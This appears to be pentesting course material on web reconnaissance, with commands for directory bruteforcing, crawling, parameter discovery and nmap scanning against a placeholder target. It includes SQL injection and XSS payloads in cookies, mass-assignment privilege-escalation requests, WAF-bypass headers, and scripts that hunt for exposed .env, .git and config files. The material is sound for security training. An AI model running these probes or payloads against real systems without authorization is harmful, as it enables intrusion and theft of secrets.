← Certified Web Application Pentester
Task 1
Directory & File Bruteforcing
1. Content Discovery Fundamentals
Content Discovery: ├── Forced Browsing (guessing paths) ├── Spidering/Crawling (following links) ├── Source Code Analysis (extracting paths) ├── Error-Based Discovery (info from errors) └── Backup/Config File Discovery
2. Gobuster
# Directory bruteforcing gobuster dir -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 # With extensions gobuster dir -u https://target.com \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \ -x php,html,txt,js,json,xml,bak,asp,aspx,jsp \ -t 50 -o gobuster_results.txt # With status code filtering gobuster dir -u https://target.com \ -w /usr/share/seclists/Discovery/Web-Content/common.txt \ -b 404,403 -t 50 # With custom headers gobuster dir -u https://target.com \ -w wordlist.txt \ -H "Authorization: Bearer TOKEN" \ -H "Cookie: session=abc123" \ -c "session=abc123" # VHOST mode gobuster vhost -u https://target.com \ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \ --append-domain # DNS mode gobuster dns -d target.com \ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt # S3 bucket brute gobuster s3 -w bucket-names.txt # Fuzzing mode gobuster fuzz -u https://target.com/FUZZ -w wordlist.txt # Flags reference # -t Threads (default 10) # -b Blacklist status codes # -s Whitelist status codes # -k Skip TLS verification # -p Proxy URL # -a User agent # -r Follow redirects # -n Don't print status codes # --no-error Don't display errors # --wildcard Force wildcard processing
3. ffuf (Fuzz Faster U Fool)
# Basic directory fuzzing ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt # With extensions ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt \ -e .php,.html,.txt,.bak,.js,.json,.xml # Filter by response size ffuf -u https://target.com/FUZZ -w wordlist.txt -fs 0 ffuf -u https://target.com/FUZZ -w wordlist.txt -fs 4242 # filter specific size # Filter by status code ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,401,403 ffuf -u https://target.com/FUZZ -w wordlist.txt -fc 404 # filter 404s # Filter by word count or line count ffuf -u https://target.com/FUZZ -w wordlist.txt -fw 12 # filter by words ffuf -u https://target.com/FUZZ -w wordlist.txt -fl 5 # filter by lines # Filter by regex ffuf -u https://target.com/FUZZ -w wordlist.txt -fr "not found|error" # Multiple FUZZ keywords ffuf -u https://target.com/FUZZ1/FUZZ2 \ -w dirs.txt:FUZZ1 \ -w files.txt:FUZZ2 # POST data fuzzing ffuf -u https://target.com/login -X POST \ -d "username=FUZZ&password=test" \ -w usernames.txt -fc 401 # Header fuzzing ffuf -u https://target.com/api/data \ -H "X-Custom-Header: FUZZ" \ -w values.txt # Subdomain fuzzing ffuf -u https://FUZZ.target.com -w subdomains.txt -fs 0 # With proxy (Burp) ffuf -u https://target.com/FUZZ -w wordlist.txt -x http://127.0.0.1:8080 # Recursive scanning ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 # Output formats ffuf -u https://target.com/FUZZ -w wordlist.txt -o results.json -of json ffuf -u https://target.com/FUZZ -w wordlist.txt -o results.csv -of csv ffuf -u https://target.com/FUZZ -w wordlist.txt -o results.html -of html # Rate limiting ffuf -u https://target.com/FUZZ -w wordlist.txt -rate 100 # requests per second ffuf -u https://target.com/FUZZ -w wordlist.txt -p 0.1-0.5 # delay range in seconds # Auto-calibration (smart filtering) ffuf -u https://target.com/FUZZ -w wordlist.txt -ac
4. Feroxbuster
# Recursive content discovery (Rust-based, fast) feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/common.txt # With extensions feroxbuster -u https://target.com \ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt \ -x php,html,txt,js,json,bak \ -t 50 # Recursive with depth feroxbuster -u https://target.com -w wordlist.txt --depth 4 # With filters feroxbuster -u https://target.com -w wordlist.txt \ -C 404,403 \ -S 0 \ --filter-regex "Not Found" # With authentication feroxbuster -u https://target.com -w wordlist.txt \ -H "Authorization: Bearer TOKEN" \ -b "session=abc123" # Extract links from pages feroxbuster -u https://target.com -w wordlist.txt --extract-links # Collect words from responses for further fuzzing feroxbuster -u https://target.com -w wordlist.txt --collect-words # Output to file feroxbuster -u https://target.com -w wordlist.txt -o results.txt
5. Wordlists Selection
# SecLists - the standard # Quick scan /usr/share/seclists/Discovery/Web-Content/common.txt # 4,700 entries /usr/share/seclists/Discovery/Web-Content/big.txt # 20,400 entries # Thorough scan /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt # 220,000 entries /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt # 1,273,000 entries # Technology-specific /usr/share/seclists/Discovery/Web-Content/apache.txt /usr/share/seclists/Discovery/Web-Content/nginx.txt /usr/share/seclists/Discovery/Web-Content/iis.txt /usr/share/seclists/Discovery/Web-Content/tomcat.txt /usr/share/seclists/Discovery/Web-Content/CGIs.txt # CMS-specific /usr/share/seclists/Discovery/Web-Content/CMS/wordpress.fuzz.txt /usr/share/seclists/Discovery/Web-Content/CMS/drupal.txt /usr/share/seclists/Discovery/Web-Content/CMS/joomla-tests.txt # API-specific /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt /usr/share/seclists/Discovery/Web-Content/api/api-seen-in-wild.txt # Raft wordlists (sorted by frequency) /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt # Custom wordlist generation cewl https://target.com -d 3 -m 5 -w custom_wordlist.txt # -d depth, -m minimum word length
6. Backup and Configuration File Discovery
# Common backup file patterns BACKUP_EXTENSIONS="bak old orig save swp swo tmp temp backup copy" ORIGINAL_FILE="index.php" for ext in $BACKUP_EXTENSIONS; do for pattern in "${ORIGINAL_FILE}.${ext}" "${ORIGINAL_FILE}~" ".${ORIGINAL_FILE}.${ext}" \ "#${ORIGINAL_FILE}#" "${ORIGINAL_FILE}.save" "${ORIGINAL_FILE}.orig"; do code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/$pattern") if [ "$code" = "200" ]; then echo "[+] Found: $pattern" fi done done # Common sensitive files SENSITIVE_FILES=".env .env.bak .env.local .env.production .env.development .git/config .git/HEAD .gitignore .svn/entries .htaccess .htpasswd web.config web.config.bak wp-config.php wp-config.php.bak wp-config.php.old config.php config.inc.php database.php settings.php configuration.php config.yml config.yaml package.json composer.json Gemfile requirements.txt Dockerfile docker-compose.yml .dockerignore Makefile Rakefile Gruntfile.js robots.txt sitemap.xml crossdomain.xml clientaccesspolicy.xml phpinfo.php info.php test.php server-status server-info elmah.axd trace.axd .DS_Store Thumbs.db desktop.ini backup.sql dump.sql database.sql db.sql backup.zip backup.tar.gz site.zip" for file in $SENSITIVE_FILES; do code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/$file" 2>/dev/null) if [ "$code" = "200" ]; then echo "[+] FOUND: https://target.com/$file (200)" elif [ "$code" = "403" ]; then echo "[!] FORBIDDEN: https://target.com/$file (403)" fi done
7. Recursive and Intelligent Discovery
# Start with common.txt, then use discovered dirs for deeper scanning # Phase 1: Top-level discovery ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt \ -mc 200,301,302,401,403 -ac -o phase1.json -of json # Phase 2: Extract directories from Phase 1 cat phase1.json | jq -r '.results[] | select(.status == 301 or .status == 302) | .input.FUZZ' > discovered_dirs.txt # Phase 3: Deep scan each directory while read dir; do echo "[*] Scanning /$dir/" ffuf -u "https://target.com/$dir/FUZZ" \ -w /usr/share/seclists/Discovery/Web-Content/common.txt \ -e .php,.html,.txt,.bak,.json,.xml \ -mc 200,301,302,401,403 -ac \ -o "phase2_${dir}.json" -of json 2>/dev/null done < discovered_dirs.txt # CeWL - Custom Word List generator from target cewl https://target.com -d 3 -m 5 -w cewl_wordlist.txt # Use discovered words for further fuzzing ffuf -u https://target.com/FUZZ -w cewl_wordlist.txt -e .php,.html,.txt
8. WAF-Aware Content Discovery
# Slower scanning to avoid WAF blocks ffuf -u https://target.com/FUZZ -w wordlist.txt -rate 50 -p 0.5-1.0 # Rotate user agents ffuf -u https://target.com/FUZZ -w wordlist.txt \ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # Use different HTTP methods ffuf -u https://target.com/FUZZ -w wordlist.txt -X POST ffuf -u https://target.com/FUZZ -w wordlist.txt -X OPTIONS # Add headers to bypass WAF ffuf -u https://target.com/FUZZ -w wordlist.txt \ -H "X-Forwarded-For: 127.0.0.1" \ -H "X-Original-URL: /FUZZ" \ -H "X-Rewrite-URL: /FUZZ" # Case variation # admin → Admin, ADMIN, aDmIn # Use tools like casemod to generate variations # Path normalization bypass # /admin → /./admin, //admin, /admin/, /%61dmin # /admin → /Admin, /ADMIN # /admin.php → /admin.PhP, /admin.php.
9. Git Repository Exposure
# Check for exposed .git directory curl -s https://target.com/.git/config curl -s https://target.com/.git/HEAD curl -s https://target.com/.git/logs/HEAD # git-dumper - download exposed git repository git-dumper https://target.com/.git/ ./git_dump # GitTools # Dumper ./gitdumper.sh https://target.com/.git/ ./git_dump # Extractor ./extractor.sh ./git_dump ./git_extracted # After extraction, analyze: cd git_extracted git log --oneline -50 # Commit history git log --all --diff-filter=D -- . # Deleted files git show HEAD~5:config.php # Old file versions git diff HEAD~10 HEAD # Changes over time git log -p --all -S 'password' # Search for passwords in history git log -p --all -S 'api_key' # Search for API keys # SVN exposure curl -s https://target.com/.svn/entries svn-extractor https://target.com/.svn/ ./svn_dump
10. Content Discovery Methodology
# Recommended approach: 1. Start with quick scan (common.txt, no extensions) 2. Add technology-specific extensions based on fingerprinting 3. Use technology-specific wordlists (wordpress.fuzz.txt, etc.) 4. Check for sensitive files (backup, config, git) 5. Run recursive scan on discovered directories 6. Generate custom wordlist with CeWL 7. Check for virtual hosts 8. Scan with authenticated session (different content) 9. Try different HTTP methods on 405 responses 10. Fuzz parameters on discovered endpoints # Quick wins to always check: /robots.txt /sitemap.xml /.git/config /.env /admin /login /api /swagger /graphql /debug /console /phpinfo.php /server-status /actuator /.well-known/ /crossdomain.xml
Task 2
Web Crawling and Spidering
Module 03 - Lesson 02: Web Crawling and Spidering
1. Crawling vs Bruteforcing
Crawling: Follows links found in pages (discovers linked content) Bruteforcing: Guesses paths from wordlists (discovers unlinked content) Best approach: BOTH - Crawl first to discover linked content - Bruteforce to find hidden content - Use crawl results to build custom wordlists for more bruteforcing
2. Burp Suite Spider
# Burp Suite Crawler (formerly Spider) # Target → Site map → Right-click → Scan → Crawl # Configuration: # Dashboard → New scan → Crawl # - Maximum crawl depth: 10 # - Maximum unique locations: 5000 # - Crawl strategy: Fastest/More Complete/Most Complete # - Login credentials for authenticated crawling # Passive Spider: # Automatically builds site map from proxied traffic # Enable: Target → Site map (auto-populated) # Key settings: # Project Options → Connections → Timeouts # Spider → Crawler Settings: # - Follow redirects: Yes # - Maximum link depth: 10 # - Form submission: Smart # - Scope: In-scope only
3. OWASP ZAP Spider
# ZAP Spider (traditional) # Tools → Spider → Starting point URL → Start # ZAP AJAX Spider (for JavaScript-heavy apps) # Tools → AJAX Spider → Starting point URL → Start # Uses browser (Firefox/Chrome) to render JavaScript # Discovers dynamic content that traditional spiders miss # ZAP CLI zap-cli spider https://target.com zap-cli ajax-spider https://target.com # ZAP API curl "http://localhost:8080/JSON/spider/action/scan/?url=https://target.com" curl "http://localhost:8080/JSON/ajaxSpider/action/scan/?url=https://target.com" # Check results curl "http://localhost:8080/JSON/spider/view/results/?scanId=0"
4. Command-Line Crawlers
# gospider - Go-based web spider gospider -s https://target.com -c 10 -d 3 -o gospider_output gospider -s https://target.com -c 10 -d 3 --js --sitemap --robots -o gospider_output # Options: # -c Concurrent requests # -d Depth # --js Parse JavaScript files # --sitemap Parse sitemap.xml # --robots Parse robots.txt # -a Include other sources (wayback, commoncrawl, virustotal) # -H Custom header # -p Proxy # hakrawler - fast web crawler echo https://target.com | hakrawler -d 3 -t 10 -plain > hakrawler_urls.txt echo https://target.com | hakrawler -d 3 -js -linkfinder > hakrawler_all.txt # katana - next-gen web crawler (ProjectDiscovery) katana -u https://target.com -d 5 -jc -kf -o katana_results.txt # Options: # -d Depth # -jc JavaScript crawling # -kf Known files (robots.txt, sitemap.xml) # -aff Auto form fill # -hl Headless browser # -H Custom header # -proxy Proxy URL # -f url Field to output # Headless browser crawling katana -u https://target.com -hl -d 5 -jc -o katana_headless.txt # Crawl with authentication katana -u https://target.com -H "Cookie: session=abc123" -d 5 -o katana_auth.txt # Crawl multiple targets katana -list urls.txt -d 3 -jc -o katana_multi.txt # wget mirror wget --mirror --page-requisites --html-extension --convert-links \ --restrict-file-names=windows --no-parent \ -P ./mirror https://target.com
5. JavaScript-Aware Crawling
# Modern web apps use JavaScript for routing and content loading # Traditional crawlers miss this content # Headless Chrome crawling # Puppeteer script cat > crawl.js << 'JS' const puppeteer = require('puppeteer'); (async () => { const browser = await puppeteer.launch({headless: true}); const page = await browser.newPage(); const urls = new Set(); page.on('request', req => urls.add(req.url())); await page.goto('https://target.com', {waitUntil: 'networkidle0'}); // Click all links const links = await page.$$eval('a', as => as.map(a => a.href)); links.forEach(l => urls.add(l)); // Extract from JavaScript const content = await page.content(); const jsUrls = content.match(/["'](\/[a-zA-Z0-9\/\-._]+)["']/g); if (jsUrls) jsUrls.forEach(u => urls.add(u)); urls.forEach(u => console.log(u)); await browser.close(); })(); JS # Playwright-based crawling # Similar but supports Chrome, Firefox, and WebKit # katana headless mode katana -u https://target.com -hl -d 5 -jc -ef png,jpg,gif,css,woff -o headless_results.txt # ZAP AJAX Spider (browser-based) # Best for single-page applications (SPA)
6. Authenticated Crawling
# Crawl with session cookie gospider -s https://target.com -H "Cookie: session=abc123" -c 10 -d 3 -o auth_crawl katana -u https://target.com -H "Cookie: session=abc123" -d 5 -o auth_katana.txt # Crawl with multiple roles # Admin crawl katana -u https://target.com -H "Cookie: admin_session=xyz" -d 5 -o admin_crawl.txt # User crawl katana -u https://target.com -H "Cookie: user_session=abc" -d 5 -o user_crawl.txt # Compare results (find admin-only pages) comm -23 <(sort admin_crawl.txt) <(sort user_crawl.txt) > admin_only_pages.txt # Burp Suite authenticated crawling # 1. Login through browser with proxy # 2. Configure session handling rules # 3. Run crawler with session macro # Scanner → Scan configuration → Application login → Record macro # ZAP authenticated crawling # 1. Manual explore → login # 2. Set authentication method # 3. Set user context # 4. Spider with user context
7. Sitemap and robots.txt Analysis
# Parse robots.txt curl -s https://target.com/robots.txt # Extract disallowed paths (interesting hidden content) curl -s https://target.com/robots.txt | grep "Disallow:" | awk '{print $2}' | \ while read path; do code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com$path" 2>/dev/null) echo "$code $path" done # Parse sitemap.xml curl -s https://target.com/sitemap.xml | grep -oP '<loc>\K[^<]+' | sort -u # Nested sitemaps curl -s https://target.com/sitemap_index.xml | grep -oP '<loc>\K[^<]+' | \ while read sitemap; do curl -s "$sitemap" | grep -oP '<loc>\K[^<]+' done | sort -u > all_sitemap_urls.txt # Common sitemap locations for path in /sitemap.xml /sitemap_index.xml /sitemap.xml.gz /sitemaps.xml \ /sitemap1.xml /sitemap/sitemap.xml /wp-sitemap.xml; do code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com$path") if [ "$code" = "200" ]; then echo "[+] Found: $path" fi done
8. Form Discovery and Analysis
# Extract all forms from crawled pages curl -s https://target.com | grep -oP '<form[^>]*>.*?</form>' # Extract form actions curl -s https://target.com | grep -oP 'action="[^"]*"' | sort -u # Extract input fields curl -s https://target.com/login | grep -oP '<input[^>]*>' | \ grep -oP 'name="[^"]*"' | sort -u # Hidden fields (often contain CSRF tokens, session data) curl -s https://target.com | grep -oP '<input[^>]*type="hidden"[^>]*>' # File upload forms curl -s https://target.com | grep -oP '<input[^>]*type="file"[^>]*>' curl -s https://target.com | grep -oP 'enctype="multipart/form-data"' # Form analysis with Burp Suite # Proxy → HTTP History → Filter → Show only items with parameters # Target → Site map → right-click → Engagement tools → Find forms
9. API Endpoint Mapping
# Build API map from crawled content cat crawl_results.txt | grep -iE "/api/" | sort -u > api_map.txt # Categorize API endpoints cat api_map.txt | while read url; do path=$(echo "$url" | grep -oP '/api/[^?]+') method="GET" # default echo "$method $path" done | sort -u > api_routes.txt # Test each endpoint with different methods while read route; do path=$(echo "$route" | awk '{print $2}') for method in GET POST PUT DELETE PATCH OPTIONS; do code=$(curl -s -o /dev/null -w "%{http_code}" -X $method "https://target.com$path" 2>/dev/null) if [ "$code" != "405" ] && [ "$code" != "404" ]; then echo "$method $path → $code" fi done done < api_routes.txt > api_method_map.txt # OpenAPI/Swagger spec generation from crawled endpoints # Use Burp Suite → Export → OpenAPI spec # Or manually construct based on discovered endpoints
10. Complete Crawling Pipeline
#!/bin/bash # crawl_pipeline.sh TARGET=$1 OUTDIR="recon/${TARGET}/crawl" mkdir -p $OUTDIR echo "=== Web Crawling Pipeline: $TARGET ===" # Phase 1: Quick spider echo "[1/5] Quick crawl..." gospider -s "https://$TARGET" -c 10 -d 3 --js --sitemap --robots \ -o $OUTDIR/gospider 2>/dev/null cat $OUTDIR/gospider/* 2>/dev/null | grep -oP 'https?://[^\s]+' | sort -u > $OUTDIR/gospider_urls.txt # Phase 2: Headless crawl for JS content echo "[2/5] Headless crawl..." katana -u "https://$TARGET" -hl -d 5 -jc -kf -silent > $OUTDIR/katana_urls.txt 2>/dev/null # Phase 3: Combine all URLs echo "[3/5] Combining results..." cat $OUTDIR/gospider_urls.txt $OUTDIR/katana_urls.txt | sort -u > $OUTDIR/all_crawled.txt # Phase 4: Extract and categorize echo "[4/5] Categorizing..." # Forms and inputs cat $OUTDIR/all_crawled.txt | grep -iE "(login|register|search|upload|contact|comment)" > $OUTDIR/interesting_forms.txt # API endpoints cat $OUTDIR/all_crawled.txt | grep -iE "(api|graphql|rest)" > $OUTDIR/api_endpoints.txt # Parameters cat $OUTDIR/all_crawled.txt | grep "?" | sort -u > $OUTDIR/parameterized.txt # File paths cat $OUTDIR/all_crawled.txt | grep -iE "\.(js|json|xml|php|asp)" > $OUTDIR/interesting_files.txt # Phase 5: Summary echo "[5/5] Summary..." echo "Total URLs crawled: $(wc -l < $OUTDIR/all_crawled.txt)" echo "Parameterized URLs: $(wc -l < $OUTDIR/parameterized.txt)" echo "API endpoints: $(wc -l < $OUTDIR/api_endpoints.txt)" echo "Results saved to $OUTDIR/"
Task 3
Parameter Discovery and Analysis
1. Parameter Discovery Methodology
Parameter Sources: ├── URL query parameters (?id=1&name=test) ├── POST body parameters (form data, JSON) ├── HTTP headers (custom headers) ├── Cookies (session, preferences) ├── Path parameters (/api/users/123) ├── Fragment identifiers (#section) ├── WebSocket messages └── Hidden/undocumented parameters
2. Arjun - Parameter Discovery
# Basic parameter discovery arjun -u https://target.com/endpoint # With custom wordlist arjun -u https://target.com/endpoint -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt # Multiple URLs arjun -i urls.txt -oJ arjun_results.json # Specific HTTP methods arjun -u https://target.com/api/users -m POST arjun -u https://target.com/api/users -m JSON # JSON body # With headers arjun -u https://target.com/endpoint --headers "Cookie: session=abc;Authorization: Bearer token" # Rate limiting arjun -u https://target.com/endpoint --rate 50 # Stable mode (more accurate, slower) arjun -u https://target.com/endpoint --stable # Output formats arjun -u https://target.com/endpoint -oJ output.json arjun -u https://target.com/endpoint -oT output.txt
3. x8 - Hidden Parameter Discovery
# x8 - fast parameter discovery x8 -u "https://target.com/endpoint" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt # With custom wordlist x8 -u "https://target.com/api/users" \ -w params.txt \ -X POST \ -H "Content-Type: application/json" # Test headers as parameters x8 -u "https://target.com/endpoint" -w headers.txt --headers # Multiple URLs x8 -u "https://target.com/endpoint1" -u "https://target.com/endpoint2" -w params.txt
4. Burp Suite Parameter Discovery
# Param Miner Extension # Extensions → BApp Store → Install "Param Miner" # Usage: # Right-click request → Extensions → Param Miner → Guess params # Options: # - Guess GET params # - Guess POST params # - Guess headers # - Guess cookies # Param Miner techniques: # 1. Adds parameters one at a time # 2. Compares response to baseline # 3. Reports parameters that change the response # Burp Scanner parameter handling: # Scanner → Scan configuration → Audit optimization # - Follow redirects: Always # - Include parameters: All # - Handle application errors: Report # Active Scan: # Right-click request → Scan → Active scan # Tests all discovered parameters for vulnerabilities
5. Parameter Wordlists
# Best wordlists for parameter discovery # Burp Suite built-in /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt # 6,453 params # Common parameters # id, user_id, uid, account_id, item_id → IDOR # url, redirect, next, return, goto, ref → Open Redirect, SSRF # search, q, query, keyword, s, term → XSS, SQLi # file, path, page, template, include → LFI/RFI # cmd, exec, command, run → Command Injection # email, username, user, login → Account Enumeration # sort, order, column, dir → SQLi (ORDER BY) # callback, jsonp, cb → JSONP abuse # format, type, output → XXE, SSRF # debug, test, admin → Debug mode # token, csrf, nonce → CSRF bypass # lang, language, locale → LFI # action, do, func, method → Function abuse # role, admin, is_admin, privilege → Privilege escalation # price, amount, quantity, discount → Business logic # webhook, notify_url, callback_url → SSRF # Generate custom parameter wordlist # From crawled content cat all_urls.txt | grep -oP '[?&]\K[^=]+' | sort | uniq -c | sort -rn > discovered_params.txt # From JavaScript files cat js_files/*.js | grep -oP '["'"'"']([a-zA-Z_][a-zA-Z0-9_]{2,30})["'"'"']\s*:' | \ sed "s/[\"':]//g" | sort -u > js_params.txt # Combine cat /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \ discovered_params.txt js_params.txt | sort -u > custom_params.txt
6. JSON Parameter Discovery
# Test JSON body parameters curl -s -X POST "https://target.com/api/endpoint" \ -H "Content-Type: application/json" \ -d '{"test":"value"}' # Common JSON parameters to try # {"admin": true} # {"role": "admin"} # {"debug": true} # {"verbose": true} # {"internal": true} # {"is_admin": 1} # {"user_id": 1} # {"id": 1} # Mass assignment testing # Find what the normal request looks like curl -s https://target.com/api/profile -H "Authorization: Bearer TOKEN" # Try adding extra fields curl -s -X PUT https://target.com/api/profile \ -H "Authorization: Bearer TOKEN" \ -H "Content-Type: application/json" \ -d '{"name":"test","role":"admin","is_admin":true,"verified":true}' # JSON parameter pollution # {"user_id": 1, "user_id": 2} # Which one wins? # {"user": {"id": 1}, "user": {"id": 2}}
7. Header-Based Parameter Discovery
# Custom headers that may change behavior HEADERS="X-Forwarded-For X-Forwarded-Host X-Original-URL X-Rewrite-URL X-Custom-IP-Authorization X-Real-IP X-Remote-IP X-Remote-Addr X-Client-IP X-Host True-Client-IP Cluster-Client-IP X-Forwarded-Port X-Forwarded-Proto X-Forwarded-Scheme X-Original-Host X-Forwarded-Server X-Debug X-Debug-Mode X-Test X-Api-Version Api-Version Accept-Version X-Requested-With X-HTTP-Method-Override Content-Type Accept" for header in $HEADERS; do response=$(curl -s -o /dev/null -w "%{http_code}:%{size_download}" \ -H "$header: test_value_12345" https://target.com/endpoint 2>/dev/null) echo "$header → $response" done # X-HTTP-Method-Override curl -s -X POST https://target.com/api/users \ -H "X-HTTP-Method-Override: DELETE" curl -s -X POST https://target.com/api/users \ -H "X-HTTP-Method-Override: PUT" # Content-Type variations curl -s -X POST https://target.com/api/endpoint \ -H "Content-Type: application/json" -d '{"test":1}' curl -s -X POST https://target.com/api/endpoint \ -H "Content-Type: application/xml" -d '<test>1</test>' curl -s -X POST https://target.com/api/endpoint \ -H "Content-Type: application/x-www-form-urlencoded" -d 'test=1'
8. Cookie Parameter Analysis
# Extract all cookies curl -sI https://target.com | grep -i "set-cookie" # Analyze cookie values # Session cookies: random, high entropy # Preference cookies: may contain user input # Tracking cookies: analytics data # Debug cookies: may enable debug mode # Test cookie parameters # Add debug cookies curl -s -b "debug=true" https://target.com curl -s -b "admin=true" https://target.com curl -s -b "role=admin" https://target.com curl -s -b "test=1" https://target.com curl -s -b "internal=1" https://target.com # Cookie injection points # Try injecting into existing cookie values curl -s -b "lang=en' OR 1=1--" https://target.com curl -s -b "theme=<script>alert(1)</script>" https://target.com
9. GraphQL Parameter Enumeration
# GraphQL field discovery # Introspection query curl -s -X POST -H "Content-Type: application/json" \ -d '{"query":"{ __schema { types { name fields { name } } } }"}' \ https://target.com/graphql | jq '.data.__schema.types[] | select(.fields != null) | {name, fields: [.fields[].name]}' # Field suggestion exploitation # Some GraphQL servers suggest similar field names on typos curl -s -X POST -H "Content-Type: application/json" \ -d '{"query":"{ user { passwor } }"}' \ https://target.com/graphql # Response: "Did you mean 'password'?" # Brute force fields when introspection is disabled # clairvoyance python3 clairvoyance.py -w field_wordlist.txt -d https://target.com/graphql # Common GraphQL fields to test: # user { id name email password role admin token } # users { id name email role } # config { debug secret key } # flag { value } # admin { users settings }
10. Parameter Analysis Script
#!/bin/bash # param_analysis.sh TARGET=$1 ENDPOINT=$2 OUTDIR="recon/${TARGET}/params" mkdir -p $OUTDIR echo "=== Parameter Analysis: $ENDPOINT ===" # Baseline response echo "[1/4] Getting baseline..." BASELINE_SIZE=$(curl -s "https://$TARGET$ENDPOINT" | wc -c) BASELINE_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://$TARGET$ENDPOINT") echo "Baseline: $BASELINE_CODE ($BASELINE_SIZE bytes)" # Test GET parameters echo "[2/4] Testing GET parameters..." while read param; do resp_size=$(curl -s "https://$TARGET${ENDPOINT}?${param}=test123" | wc -c) resp_code=$(curl -s -o /dev/null -w "%{http_code}" "https://$TARGET${ENDPOINT}?${param}=test123") if [ "$resp_size" != "$BASELINE_SIZE" ] || [ "$resp_code" != "$BASELINE_CODE" ]; then echo "[+] Parameter affects response: $param (code=$resp_code, size=$resp_size)" echo "$param" >> $OUTDIR/valid_params.txt fi done < /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt # Test POST parameters echo "[3/4] Testing POST parameters..." while read param; do resp_size=$(curl -s -X POST "https://$TARGET$ENDPOINT" -d "${param}=test123" | wc -c) if [ "$resp_size" != "$BASELINE_SIZE" ]; then echo "[+] POST parameter affects response: $param (size=$resp_size)" echo "$param" >> $OUTDIR/valid_post_params.txt fi done < /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt # Test custom headers echo "[4/4] Testing header parameters..." for header in X-Forwarded-For X-Original-URL X-Rewrite-URL X-Debug X-Custom-IP-Authorization; do resp_size=$(curl -s -H "$header: 127.0.0.1" "https://$TARGET$ENDPOINT" | wc -c) if [ "$resp_size" != "$BASELINE_SIZE" ]; then echo "[+] Header affects response: $header (size=$resp_size)" echo "$header" >> $OUTDIR/valid_headers.txt fi done echo "[*] Results saved to $OUTDIR/"
Task 4
Port Scanning and Service Enumeration
1. Web-Focused Port Scanning
# Common web service ports # 80 - HTTP # 443 - HTTPS # 8080 - HTTP alternate / proxy # 8443 - HTTPS alternate # 8000 - HTTP development # 8888 - HTTP alternate # 3000 - Node.js / Grafana # 5000 - Flask / Docker Registry # 9090 - Prometheus / various # 9443 - HTTPS alternate # 4443 - HTTPS alternate # 2083 - cPanel HTTPS # 2087 - WHM HTTPS # 10000 - Webmin # 7443 - Various # 8081 - HTTP alternate # 8181 - HTTP alternate # 9200 - Elasticsearch # 5601 - Kibana # 27017 - MongoDB # 6379 - Redis # 11211 - Memcached # 3306 - MySQL # 5432 - PostgreSQL # Quick web port scan nmap -p 80,443,8080,8443,8000,8888,3000,5000,9090,9443 -sV --open target.com # Full port scan nmap -p- -sV --open -T4 target.com -oA full_scan # Top 1000 ports with service detection nmap -sV -sC --open target.com -oA default_scan
2. Nmap Techniques for Web Services
# Version detection nmap -sV -p 80,443 target.com # Default scripts nmap -sC -p 80,443 target.com # Aggressive scan nmap -A -p 80,443 target.com # OS detection nmap -O target.com # Web-specific NSE scripts nmap -p 80,443 --script http-title target.com nmap -p 80,443 --script http-headers target.com nmap -p 80,443 --script http-methods target.com nmap -p 80,443 --script http-enum target.com nmap -p 80,443 --script http-robots.txt target.com nmap -p 80,443 --script http-git target.com nmap -p 80,443 --script http-config-backup target.com nmap -p 80,443 --script http-default-accounts target.com nmap -p 443 --script ssl-enum-ciphers target.com nmap -p 443 --script ssl-cert target.com nmap -p 443 --script ssl-heartbleed target.com # Vulnerability scanning nmap -p 80,443 --script "http-vuln-*" target.com nmap -p 443 --script "ssl-*" target.com # All HTTP scripts nmap -p 80 --script "http-*" target.com # Scan multiple targets nmap -iL targets.txt -p 80,443,8080,8443 -sV --open -oA multi_scan # Speed optimization nmap -T4 -p- --min-rate=1000 target.com # Fast nmap -T5 -p- --min-rate=5000 target.com # Insane (may miss results) nmap -T2 -p 80,443 target.com # Polite (slow, stealthy) # Output formats nmap -p 80,443 -sV target.com -oN normal.txt # Normal nmap -p 80,443 -sV target.com -oX output.xml # XML nmap -p 80,443 -sV target.com -oG grep.txt # Grepable nmap -p 80,443 -sV target.com -oA all_formats # All formats
3. Masscan - Fast Port Scanning
